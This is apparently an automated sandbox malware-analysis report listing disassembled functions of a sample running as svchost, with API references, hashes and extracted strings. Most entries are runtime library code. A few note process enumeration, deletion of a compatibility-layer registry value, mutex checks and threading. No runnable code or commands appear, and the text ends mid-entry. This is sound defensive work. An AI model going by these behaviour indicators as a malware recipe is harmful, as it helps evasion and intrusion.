_errno.LIBCMT ref: 000001AD894676B0
_errno.LIBCMT ref: 000001AD894676C2
_openfile.LIBCMT ref: 000001AD894676F0

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: 5bc052bb088fd35b5b602d92a9fa76e5213f3ee36b81a9307476737899bce9a8
Instruction ID: 45323133db474b821f74aa5c339369f79413a9d95e479c2580f060aa18684424
Opcode Fuzzy Hash: 5bc052bb088fd35b5b602d92a9fa76e5213f3ee36b81a9307476737899bce9a8
Instruction Fuzzy Hash: FA2124F0709F0A4FF796AB3C64013AA76D1EB9A710F15056AE4C6C3692DE68CC4087DB

Function 0000000180006C88 Relevance: 9.1, APIs: 6, Instructions: 91COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180006CC3
_invalid_parameter_noinfo.LIBCMT ref: 0000000180006CCF
_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0000000180006CF2
__crtLCMapStringA.LIBCMT ref: 0000000180006D59
_errno.LIBCMT ref: 0000000180006DCB
_errno.LIBCMT ref: 0000000180006DD9

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: _errno$Locale$StringUpdateUpdate::___crt_invalid_parameter_noinfo
String ID:
API String ID: 2056426365-0
Opcode ID: 9c87a11a63088c015eef93d34a9913030e38673030c7ee5cd4f8d2b3a46e3baf
Instruction ID: 1be74027af8b6ec6c48b4e2238035b7b216e12fb5bcc336f95e9ea6e429cc1f7
Opcode Fuzzy Hash: 9c87a11a63088c015eef93d34a9913030e38673030c7ee5cd4f8d2b3a46e3baf
Instruction Fuzzy Hash: E841A672A086C885FB93CB14A1543ED7B91E7497C4F18C525FBC5477AADF68C649C700

Function 000001AD8946FB78 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001AD8946FBA3

Part of subcall function 000001AD89469FE0: _getptd_noexit.LIBCMT ref: 000001AD89469FE4

__lock_fhandle.LIBCMT ref: 000001AD8946FBE7
_unlock_fhandle.LIBCMT ref: 000001AD8946FC21

Part of subcall function 000001AD89469F70: _getptd_noexit.LIBCMT ref: 000001AD89469F74

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__lock_fhandle_errno_unlock_fhandle
String ID:
API String ID: 1756211493-0
Opcode ID: 1b0ba3c125c53c84a92fdf2b06e9d539b91ec996238f7a8b4ac5e6912e78a014
Instruction ID: 4e1bccfebcbb578e6bf95df4e748da87392a1d0a41134f910bd643ed404b3cb0
Opcode Fuzzy Hash: 1b0ba3c125c53c84a92fdf2b06e9d539b91ec996238f7a8b4ac5e6912e78a014
Instruction Fuzzy Hash: DB210AB0709E045EF31A675CB8523FC32D0EB83B20F050548E4D7C75D7D6A8580182DB

Function 000001AD89472504 Relevance: 9.1, APIs: 6, Instructions: 78COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001AD8947251D

Part of subcall function 000001AD89469FE0: _getptd_noexit.LIBCMT ref: 000001AD89469FE4

__lock_fhandle.LIBCMT ref: 000001AD89472565
_errno.LIBCMT ref: 000001AD894725A1
_unlock_fhandle.LIBCMT ref: 000001AD894725B1

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: _errno$__lock_fhandle_getptd_noexit_unlock_fhandle
String ID:
API String ID: 4059150367-0
Opcode ID: d141b6cd3c406fd51616224ba368c67d72d3d4b9d916106288e607afb7bc7dfb
Instruction ID: 2a317e5316f1248ca5c790bdd32c790891a4854f1a768989e57986f8a2a23aee
Opcode Fuzzy Hash: d141b6cd3c406fd51616224ba368c67d72d3d4b9d916106288e607afb7bc7dfb
Instruction Fuzzy Hash: 5A2106B0306E0D6EF25D6B6CB4A13ED6AD0EB46710F050158F597C76D2D6AC484083DA

Function 000000018000FF60 Relevance: 9.1, APIs: 6, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018000FF8B

Part of subcall function 000000018000A3C8: _getptd_noexit.LIBCMT ref: 000000018000A3CC

__lock_fhandle.LIBCMT ref: 000000018000FFCF
_unlock_fhandle.LIBCMT ref: 0000000180010009

Part of subcall function 000000018000A358: _getptd_noexit.LIBCMT ref: 000000018000A35C

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__lock_fhandle_errno_unlock_fhandle
String ID:
API String ID: 1756211493-0
Opcode ID: aac41a0a3dfb51fb9092f1db34bf2a66c7239750bbc3eb0fb3967f55c5b8c638
Instruction ID: b0a076d32d68be970e85eeccf50f05f21c503c7fcd5b896e6cb055075171bb88
Opcode Fuzzy Hash: aac41a0a3dfb51fb9092f1db34bf2a66c7239750bbc3eb0fb3967f55c5b8c638
Instruction Fuzzy Hash: 9821F332604A4846F793AF29A8413FD3650BB8DBE0F69C514BA550B3D3CFB8CB499720

Function 0000000180007B04 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180007A5B

Part of subcall function 000000018000A3C8: _getptd_noexit.LIBCMT ref: 000000018000A3CC

_invalid_parameter_noinfo.LIBCMT ref: 0000000180007A66
_getstream.LIBCMT ref: 0000000180007A86
_errno.LIBCMT ref: 0000000180007A98
_errno.LIBCMT ref: 0000000180007AAA
_openfile.LIBCMT ref: 0000000180007AD8

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: 8047b00c799ff5ef388ddbb9f50d5c2f7bb82dfb21c80998bbceadc7a6e55cd0
Instruction ID: c417f0d506a9a6e526307632f1ff71945366ff5d56bda7028e7266b9faa843bf
Opcode Fuzzy Hash: 8047b00c799ff5ef388ddbb9f50d5c2f7bb82dfb21c80998bbceadc7a6e55cd0
Instruction Fuzzy Hash: B221C37171478A41FBA3DB21A80139EB690A79EBD0F04D420BA4D97B87DF3CC7458712

Function 0000000180002E20 Relevance: 7.8, APIs: 5, Instructions: 296processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0000000180002FB6
Process32First.KERNEL32 ref: 0000000180002FDD
memmove_s.LIBCMT ref: 00000001800030C3
Process32Next.KERNEL32 ref: 000000018000318A

Part of subcall function 0000000180001240: _CxxThrowException.LIBCMT ref: 0000000180001254

CloseHandle.KERNEL32 ref: 00000001800031B4

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateExceptionFirstHandleNextSnapshotThrowToolhelp32memmove_s
String ID:
API String ID: 2070426160-0
Opcode ID: 432c5b36e9222c5f2b04d3049547f65da605255b8839af9f6800abb27225b9f5
Instruction ID: deb589468144d4d24d29fc67ccc3faf017256210460a192db9f6d27b3c9be20f
Opcode Fuzzy Hash: 432c5b36e9222c5f2b04d3049547f65da605255b8839af9f6800abb27225b9f5
Instruction Fuzzy Hash: 01C1BF32700A4886EB97DB25D4553EE77A4E74CBE4F048226FA69476E5CF38CA89C740

Function 000001AD89472110 Relevance: 7.7, APIs: 5, Instructions: 201COMMON

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 000001AD8947213D

Part of subcall function 000001AD8946F080: _FF_MSGBANNER.LIBCMT ref: 000001AD8946F09D
Part of subcall function 000001AD8946F080: _NMSG_WRITE.LIBCMT ref: 000001AD8946F0A7

_lock.LIBCMT ref: 000001AD89472150
_lock.LIBCMT ref: 000001AD894721AB
_calloc_crt.LIBCMT ref: 000001AD89472262

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: _lock$_calloc_crt_mtinitlocknum
String ID:
API String ID: 3962633935-0
Opcode ID: d44b873149b9006942da67a867c652ae1859f4a614215c6e6d51a695d0603cc5
Instruction ID: 32961fa9622572a918bd47560ade871a3e4549e7cfad124c11412907a5293d5c
Opcode Fuzzy Hash: d44b873149b9006942da67a867c652ae1859f4a614215c6e6d51a695d0603cc5
Instruction Fuzzy Hash: BF5104B0619F0C9BE7189F1CE8813E5B3D0FB59710F11015DE88BC76A2D638D8428ACB

Function 0000000180012B00 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0000000180012B62
_isleadbyte_l.LIBCMT ref: 0000000180012B92
MultiByteToWideChar.KERNEL32 ref: 0000000180012BD1
MultiByteToWideChar.KERNEL32 ref: 0000000180012C1F
_errno.LIBCMT ref: 0000000180012C29

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: 5466015a77196f569951c27b764923028f559785feb8afd6911463fc7175fde2
Instruction ID: 4e83a7bfb4e8c8ad68e4d1d2500786b75b5026e94a1c92e57826ff4685488a1b
Opcode Fuzzy Hash: 5466015a77196f569951c27b764923028f559785feb8afd6911463fc7175fde2
Instruction Fuzzy Hash: D141B332208B8486E7A2CF15E5903A977A5F748BC4F14C125FB8957B95DF38C6558700

Function 000001AD89468468 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 000001AD89468475

Part of subcall function 000001AD89469D60: _getptd_noexit.LIBCMT ref: 000001AD89469D66

_inconsistency.LIBCMT ref: 000001AD89468483
_getptd.LIBCMT ref: 000001AD89468488
_inconsistency.LIBCMT ref: 000001AD894684A4
_getptd.LIBCMT ref: 000001AD894684B4

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$_getptd_noexit
String ID:
API String ID: 3003190580-0
Opcode ID: b5479a7c54eb2bfe29ab996b0a4a5494bdafe09a8fce9f3b8610da9c17d215e3
Instruction ID: 24e6d07d7812dbbe442afc52073cfb4d1bef7f39846c06784fb9029d4543452c
Opcode Fuzzy Hash: b5479a7c54eb2bfe29ab996b0a4a5494bdafe09a8fce9f3b8610da9c17d215e3
Instruction Fuzzy Hash: 34F012B1325D094EFBB2EB5CE081BE967D0FB4DB00F4401E4E18AC7687E5689850879A

Function 0000000180008850 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 000000018000885D

Part of subcall function 000000018000A148: _getptd_noexit.LIBCMT ref: 000000018000A14E
Part of subcall function 000000018000A148: _amsg_exit.LIBCMT ref: 000000018000A15E

_inconsistency.LIBCMT ref: 000000018000886B

Part of subcall function 000000018000F180: DecodePointer.KERNEL32(?,?,?,?,000000018000F12D,?,?,?,00000001800084B6), ref: 000000018000F18B

_getptd.LIBCMT ref: 0000000180008870
_inconsistency.LIBCMT ref: 000000018000888C
_getptd.LIBCMT ref: 000000018000889C

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
String ID:
API String ID: 3669027769-0
Opcode ID: 5256d530cf8fb0733b6c45ef725c6028a4fdbb7ed0a467f135b8230d2b8f0db7
Instruction ID: 93d00fa1b07646867e598b62ce68de74e87f64fd6bccb6a10b21d916c29cf2e0
Opcode Fuzzy Hash: 5256d530cf8fb0733b6c45ef725c6028a4fdbb7ed0a467f135b8230d2b8f0db7
Instruction Fuzzy Hash: 01F0F83220868990EAE3EBA5E1413FC72A0BB4DBC0F9CC121F6C407687DE20C698A310

Function 000001AD8947458B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 000001AD89468468: _getptd.LIBCMT ref: 000001AD89468475
Part of subcall function 000001AD89468468: _inconsistency.LIBCMT ref: 000001AD89468483
Part of subcall function 000001AD89468468: _getptd.LIBCMT ref: 000001AD89468488
Part of subcall function 000001AD89468468: _inconsistency.LIBCMT ref: 000001AD894684A4

__DestructExceptionObject.LIBCMT ref: 000001AD894745D8
_getptd.LIBCMT ref: 000001AD894745DE
_getptd.LIBCMT ref: 000001AD894745F1

Part of subcall function 000001AD894684F8: _getptd.LIBCMT ref: 000001AD89468501

Strings

csm, xrefs: 000001AD894745AB

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$DestructExceptionObject
String ID: csm
API String ID: 2821275340-1018135373
Opcode ID: 202e796deccf727fed01be6fe4bf2f3972181cc28ff062ca8e6bd5ec0cdf9c9c
Instruction ID: 4629cb29690b4cdf50218ceb6374ab64983d97bdfaee84458ffefbbaa7985651
Opcode Fuzzy Hash: 202e796deccf727fed01be6fe4bf2f3972181cc28ff062ca8e6bd5ec0cdf9c9c
Instruction Fuzzy Hash: E10152B0212D0D4FEBA8EF5C98C47F83395FB19711F401165E84AC7A82DA699891CB86

Function 0000000180014973 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180008850: _getptd.LIBCMT ref: 000000018000885D
Part of subcall function 0000000180008850: _inconsistency.LIBCMT ref: 000000018000886B
Part of subcall function 0000000180008850: _getptd.LIBCMT ref: 0000000180008870
Part of subcall function 0000000180008850: _inconsistency.LIBCMT ref: 000000018000888C

__DestructExceptionObject.LIBCMT ref: 00000001800149C0
_getptd.LIBCMT ref: 00000001800149C6
_getptd.LIBCMT ref: 00000001800149D9

Part of subcall function 00000001800088E0: _getptd.LIBCMT ref: 00000001800088E9

Strings

csm, xrefs: 0000000180014993

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$DestructExceptionObject
String ID: csm
API String ID: 2821275340-1018135373
Opcode ID: 7a857e1845d70c2f1e5f6804da9a529f8c5d020c3f18e8610798c0053a23aa55
Instruction ID: 9cd088e2127e12a35e9e8c2f70f68ea196f33fdfc55e2358cdbc67d2aa166ec7
Opcode Fuzzy Hash: 7a857e1845d70c2f1e5f6804da9a529f8c5d020c3f18e8610798c0053a23aa55
Instruction Fuzzy Hash: 38016233100A49C9EBA2EF31C8813ED33A4E74DBD8F449521FA4D4A749DE20DA88C341

Function 0000000180001660 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00000001800016A4
RegDeleteValueW.ADVAPI32 ref: 00000001800016B6
RegCloseKey.ADVAPI32 ref: 00000001800016CB

Strings

Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers, xrefs: 0000000180001681

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
API String ID: 849931509-1966416226
Opcode ID: 576077573795a395ca207de0159431a879f6a68bb6cbe38a081e799d34acbc28
Instruction ID: 66a7aa45e8abdeec823b389cadaca9be84f8538ef03a33af900ba0b2d752987a
Opcode Fuzzy Hash: 576077573795a395ca207de0159431a879f6a68bb6cbe38a081e799d34acbc28
Instruction Fuzzy Hash: C7014471724B4486EB828B25F89475A7360FB8CBD4F405125FE9B47768DF68C6588700

Function 0000000180002CC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180001450: _wcsftime_l.LIBCMT ref: 00000001800014B7

Sleep.KERNEL32 ref: 0000000180002CD5
CreateThread.KERNEL32 ref: 0000000180002D26

Part of subcall function 0000000180001EB0: sprintf.LIBCMT ref: 0000000180001F63
Part of subcall function 0000000180001EB0: OpenMutexA.KERNEL32 ref: 0000000180001FE1
Part of subcall function 0000000180001EB0: GetLastError.KERNEL32 ref: 0000000180001FEA
Part of subcall function 0000000180001EB0: OpenMutexA.KERNEL32 ref: 000000018000200A
Part of subcall function 0000000180001EB0: GetLastError.KERNEL32 ref: 0000000180002013

Sleep.KERNEL32 ref: 0000000180002CF2

Part of subcall function 00000001800027C0: OpenMutexA.KERNEL32 ref: 000000018000291B
Part of subcall function 00000001800027C0: GetLastError.KERNEL32 ref: 0000000180002924
Part of subcall function 00000001800027C0: OpenMutexA.KERNEL32 ref: 0000000180002941
Part of subcall function 00000001800027C0: GetLastError.KERNEL32 ref: 000000018000294A

Strings

5-2, xrefs: 0000000180002D01

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLastMutexOpen$Sleep$CreateThread_wcsftime_lsprintf
String ID: 5-2
API String ID: 1340651867-891090182
Opcode ID: 75d49f292586f665f06d7c91a419348743d5eab30d4fce118a7bc9160b32fb07
Instruction ID: 84f20dae55dd682c76dce56c8f0ba95abba88ee20439183f8e5b207b28591710
Opcode Fuzzy Hash: 75d49f292586f665f06d7c91a419348743d5eab30d4fce118a7bc9160b32fb07
Instruction Fuzzy Hash: 2E017931A1494982F7D7EB71ED523DA3255AB9C3C5F84C126B90E861F6EE28CB0D8750

Function 0000000180007E98 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 0000000180007EA6
malloc.LIBCMT ref: 0000000180007EB2

Part of subcall function 0000000180007414: _FF_MSGBANNER.LIBCMT ref: 0000000180007444
Part of subcall function 0000000180007414: _NMSG_WRITE.LIBCMT ref: 000000018000744E
Part of subcall function 0000000180007414: HeapAlloc.KERNEL32(?,?,00000000,000000018000BDCC,?,?,?,000000018000F4C0,?,?,?,000000018000F3BF,?,?,00000000,000000018000A256), ref: 0000000180007469
Part of subcall function 0000000180007414: _callnewh.LIBCMT ref: 0000000180007482
Part of subcall function 0000000180007414: _errno.LIBCMT ref: 000000018000748D
Part of subcall function 0000000180007414: _errno.LIBCMT ref: 0000000180007498

_CxxThrowException.LIBCMT ref: 0000000180007EFB

Part of subcall function 00000001800083A8: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180006345), ref: 0000000180008437
Part of subcall function 00000001800083A8: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180006345), ref: 0000000180008476

Strings

bad allocation, xrefs: 0000000180007EC2

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
String ID: bad allocation
API String ID: 1214304046-2104205924
Opcode ID: 83299bb98c5ba274bebe642ff6e9d456f243cf94dafa81c08a6ffed90b0717de
Instruction ID: 8c456ec7b0dfa129b78a71529ed360227697a22e1ce351fcfc27dcdf84fd50ae
Opcode Fuzzy Hash: 83299bb98c5ba274bebe642ff6e9d456f243cf94dafa81c08a6ffed90b0717de
Instruction Fuzzy Hash: 45F04971701B4E40EEA6D740A4013D563A4F79C3C4F448421AA8D06697EE3CC34CCB01

Function 000001AD894615E8 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 222COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 000001AD894616B8

Part of subcall function 000001AD89466A50: _errno.LIBCMT ref: 000001AD89466A88
Part of subcall function 000001AD89466A50: _invalid_parameter_noinfo.LIBCMT ref: 000001AD89466A93

Part of subcall function 000001AD89465C68: sprintf.LIBCMT ref: 000001AD89465D06

Strings

dh74, xrefs: 000001AD89461631
83y., xrefs: 000001AD89461638
13a., xrefs: 000001AD8946162A

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: sprintf$_errno_invalid_parameter_noinfo
String ID: 13a.$83y.$dh74
API String ID: 497604498-3522534043
Opcode ID: b06f836396c8decc4b724427a3c82975a05fcb9bcb80fa40c0f4ad766a3eab19
Instruction ID: 0cde9e117e64651ca938c4831223f337f99cb4b1f0d67765dd37bdadba7f4786
Opcode Fuzzy Hash: b06f836396c8decc4b724427a3c82975a05fcb9bcb80fa40c0f4ad766a3eab19
Instruction Fuzzy Hash: D5815D70A18E5C8FEB45EF68D8887DEB7E1FB59301F504519E48BC31A2DB348944CB86

Function 000001AD89461858 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 222COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 000001AD89461928

Part of subcall function 000001AD89466A50: _errno.LIBCMT ref: 000001AD89466A88
Part of subcall function 000001AD89466A50: _invalid_parameter_noinfo.LIBCMT ref: 000001AD89466A93

Part of subcall function 000001AD89465C68: sprintf.LIBCMT ref: 000001AD89465D06

Strings

dg79, xrefs: 000001AD894618A1
2#b., xrefs: 000001AD8946189A
83%1, xrefs: 000001AD894618A8

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: sprintf$_errno_invalid_parameter_noinfo
String ID: 2#b.$83%1$dg79
API String ID: 497604498-219530087
Opcode ID: faaa8807c14b811c25bf28320fbba4350420f1ba0c4674bab9fffd79990433f1
Instruction ID: da0e14c0490822ea088092ed6fcf34d4d544af534e35400ad6dbf62e4be5601c
Opcode Fuzzy Hash: faaa8807c14b811c25bf28320fbba4350420f1ba0c4674bab9fffd79990433f1
Instruction Fuzzy Hash: AF814B70618A9C8FEB45EF68D8887DDB7F1FB5A301F50451AE08BD31A2DB748944CB86

Function 000001AD89461AC8 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 196COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 000001AD89461B7B

Part of subcall function 000001AD89466A50: _errno.LIBCMT ref: 000001AD89466A88
Part of subcall function 000001AD89466A50: _invalid_parameter_noinfo.LIBCMT ref: 000001AD89466A93

Part of subcall function 000001AD89465C68: sprintf.LIBCMT ref: 000001AD89465D06

Strings

13a., xrefs: 000001AD89461B00
83y., xrefs: 000001AD89461B0E
dh74, xrefs: 000001AD89461B07

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: sprintf$_errno_invalid_parameter_noinfo
String ID: 13a.$83y.$dh74
API String ID: 497604498-3522534043
Opcode ID: 5aba02238f6d805f1ce277d98eda66def5532b63aa6b0690fc91dce229074048
